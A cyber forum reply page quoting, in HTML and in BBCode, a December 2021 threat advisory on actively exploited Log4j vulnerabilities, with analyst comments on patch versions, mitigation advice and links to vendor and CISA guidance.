Log in
Register
Cyber Forum
More options
Toggle width
Share this page
Share this page
Share
Share
Cyber Forum
Log in
Register
More options
Toggle width
Share this page
Share this page
Share
Share
Menu
Install the app
Install
Home
CyberWeekly Podcast
Breaking News! Podcast
Cyber Risk Rating
Forums
New posts
Forum list
Trending
Leaderboards
News Feeds
Resources
Latest reviews
Sophos X-Ops Intelix
Threat Reports
Members
Current visitors
My.CompTIA
Help Documents
Preference Center
Forums
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Message
<blockquote data-quote="MJ Shoer" data-source="post: 2503" data-attributes="member: 3"><p><h3><span style="color: rgb(184, 49, 47)">Severity: High</span> <span style="color: rgb(0, 168, 133)">TLP: Green</span> Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges</h3><p><strong>Tags</strong></p><ol> <li data-xf-list-type="ol"><strong>Critical CVE</strong></li> <li data-xf-list-type="ol"><strong>Cybercriminal Attack</strong></li> <li data-xf-list-type="ol"><strong>Nation State Attack</strong></li> </ol><p><strong>Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges</strong></p><p><strong></strong></p><p><strong>Summary:</strong></p><p>Microsoft and Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit the Log4j vulnerabilities, "MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications. In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their specific targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with the testing activity to fingerprint systems, (<a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" target="_blank">Microsoft, 2021</a>)."</p><p></p><p><strong>Analyst Comments:</strong></p><p>It was disclosed that a second vulnerability could result in a DOS attack on systems/software where the logging tool may be used. IT Teams scrambled to apply version 2.15 across as many vulnerable devices as possible, only to find out the patch was incomplete. Apache released version 2.16; it was thought that the only additional vulnerability would result in a denial of service attack – essentially causing a targeted system to become unresponsive. However, researchers warn of a third separate security weakness in Log4j version 2.15.0 that can "allow for exfiltration of sensitive data in certain circumstances." Technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear if this has been already addressed in version 2.16.0.</p><p></p><p><strong>Mitigation:</strong></p><p>We have shared various tools, indicators of compromise, and APT we have come across due to this recently disclosed bug. CISA has a website that contains a plethora of resources companies can use to assess risk and apply mitigation measures as necessary. Additional vulnerabilities will likely be disclosed with due time; companies should continue to monitor inbound and outbound traffic from resources that may utilize log4j.</p><p></p><p><em><strong>Apache Log4j Vulnerability Guidance</strong></em></p><ul> <li data-xf-list-type="ul"><a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance" target="_blank">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</a></li> </ul><p><em><strong><em><strong>Mitigation Guidance from JCDC Partners</strong></em></strong></em></p><ul> <li data-xf-list-type="ul"><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day" target="_blank">Broadcom's Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in the Wild content</a></li> <li data-xf-list-type="ul"><a href="https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html" target="_blank">Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild</a></li> <li data-xf-list-type="ul"><a href="https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/" target="_blank">Cloudflare Blog: CVE-2021-44228 - Log4j RCE 0-day mitigation</a></li> <li data-xf-list-type="ul"><a href="https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/" target="_blank">CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation Recommendations</a></li> <li data-xf-list-type="ul"><a href="https://securityintelligence.com/posts/apache-log4j-zero-day-vulnerability-update/" target="_blank">IBM Security Intelligence blog: How Log4j Vulnerability Could Impact You</a></li> <li data-xf-list-type="ul"><a href="https://blogs.vmware.com/security/2021/12/investigating-cve-2021-44228-log4shell-vulnerability.html" target="_blank">Investigating CVE-2021-44228 Log4Shell Vulnerability: VMWare Threat Research</a></li> <li data-xf-list-type="ul"><a href="https://www.mandiant.com/resources/log4shell-recommendations" target="_blank">Mandiant blog: Log4Shell Initial Exploitation and Mitigation Recommendations</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" target="_blank">Microsoft blog: Guidance for Preventing, Detecting, and Hunting for CVE-2021-44228 Log4j 2 Exploitation</a></li> <li data-xf-list-type="ul"><a href="https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/" target="_blank">Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-4428: Analysis and Mitigations</a></li> <li data-xf-list-type="ul"><a href="https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html" target="_blank">Splunk's blog: Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued</a></li> <li data-xf-list-type="ul"><a href="https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability?utm_campaign=00023584&utm_promoter=tenable-ops&utm_medium=homepage-hero&utm_content=other-rr-log4j-blog&utm_source=tenable-dot-com" target="_blank">Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)</a></li> <li data-xf-list-type="ul"><a href="https://blogs.vmware.com/vsphere/2021/12/vmsa-2021-0028-log4j-what-you-need-to-know.html" target="_blank">VMware Blog: Log4j Vulnerability Security Advisory: What You Need to Know</a></li> </ul><p><strong>Source:</strong></p><p><a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance" target="_blank">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</a></p><p><a href="https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html" target="_blank">https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html</a></p><p><a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" target="_blank">https://www.microsoft.com/security/...ting-for-cve-2021-44228-log4j-2-exploitation/</a></p></blockquote><p></p>
[QUOTE="MJ Shoer, post: 2503, member: 3"] [HEADING=2][COLOR=rgb(184, 49, 47)]Severity: High[/COLOR] [COLOR=rgb(0, 168, 133)]TLP: Green[/COLOR] Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges[/HEADING] [B]Tags[/B] [LIST=1] [*][B]Critical CVE[/B] [*][B]Cybercriminal Attack[/B] [*][B]Nation State Attack[/B] [/LIST] [B]Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges Summary:[/B] Microsoft and Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit the Log4j vulnerabilities, "MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications. In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their specific targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with the testing activity to fingerprint systems, ([URL='https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/']Microsoft, 2021[/URL])." [B]Analyst Comments:[/B] It was disclosed that a second vulnerability could result in a DOS attack on systems/software where the logging tool may be used. IT Teams scrambled to apply version 2.15 across as many vulnerable devices as possible, only to find out the patch was incomplete. Apache released version 2.16; it was thought that the only additional vulnerability would result in a denial of service attack – essentially causing a targeted system to become unresponsive. However, researchers warn of a third separate security weakness in Log4j version 2.15.0 that can "allow for exfiltration of sensitive data in certain circumstances." Technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear if this has been already addressed in version 2.16.0. [B]Mitigation:[/B] We have shared various tools, indicators of compromise, and APT we have come across due to this recently disclosed bug. CISA has a website that contains a plethora of resources companies can use to assess risk and apply mitigation measures as necessary. Additional vulnerabilities will likely be disclosed with due time; companies should continue to monitor inbound and outbound traffic from resources that may utilize log4j. [I][B]Apache Log4j Vulnerability Guidance[/B][/I] [LIST] [*][URL]https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance[/URL] [/LIST] [I][B][I][B]Mitigation Guidance from JCDC Partners[/B][/I][/B][/I] [LIST] [*][URL='https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day']Broadcom's Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in the Wild content[/URL] [*][URL='https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html']Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild[/URL] [*][URL='https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/']Cloudflare Blog: CVE-2021-44228 - Log4j RCE 0-day mitigation[/URL] [*][URL='https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/']CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation Recommendations[/URL] [*][URL='https://securityintelligence.com/posts/apache-log4j-zero-day-vulnerability-update/']IBM Security Intelligence blog: How Log4j Vulnerability Could Impact You[/URL] [*][URL='https://blogs.vmware.com/security/2021/12/investigating-cve-2021-44228-log4shell-vulnerability.html']Investigating CVE-2021-44228 Log4Shell Vulnerability: VMWare Threat Research[/URL] [*][URL='https://www.mandiant.com/resources/log4shell-recommendations']Mandiant blog: Log4Shell Initial Exploitation and Mitigation Recommendations[/URL] [*][URL='https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/']Microsoft blog: Guidance for Preventing, Detecting, and Hunting for CVE-2021-44228 Log4j 2 Exploitation[/URL] [*][URL='https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/']Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-4428: Analysis and Mitigations[/URL] [*][URL='https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html']Splunk's blog: Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued[/URL] [*][URL='https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability?utm_campaign=00023584&utm_promoter=tenable-ops&utm_medium=homepage-hero&utm_content=other-rr-log4j-blog&utm_source=tenable-dot-com']Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)[/URL] [*][URL='https://blogs.vmware.com/vsphere/2021/12/vmsa-2021-0028-log4j-what-you-need-to-know.html']VMware Blog: Log4j Vulnerability Security Advisory: What You Need to Know[/URL] [/LIST] [B]Source:[/B] [URL]https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance[/URL] [URL]https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html[/URL] [URL='https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/']https://www.microsoft.com/security/...ting-for-cve-2021-44228-log4j-2-exploitation/[/URL] [/QUOTE]
Name
Verification
Post reply
Forums
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
Top
Bottom
Home
Forums
Threat Reports
My.CompTIA
Menu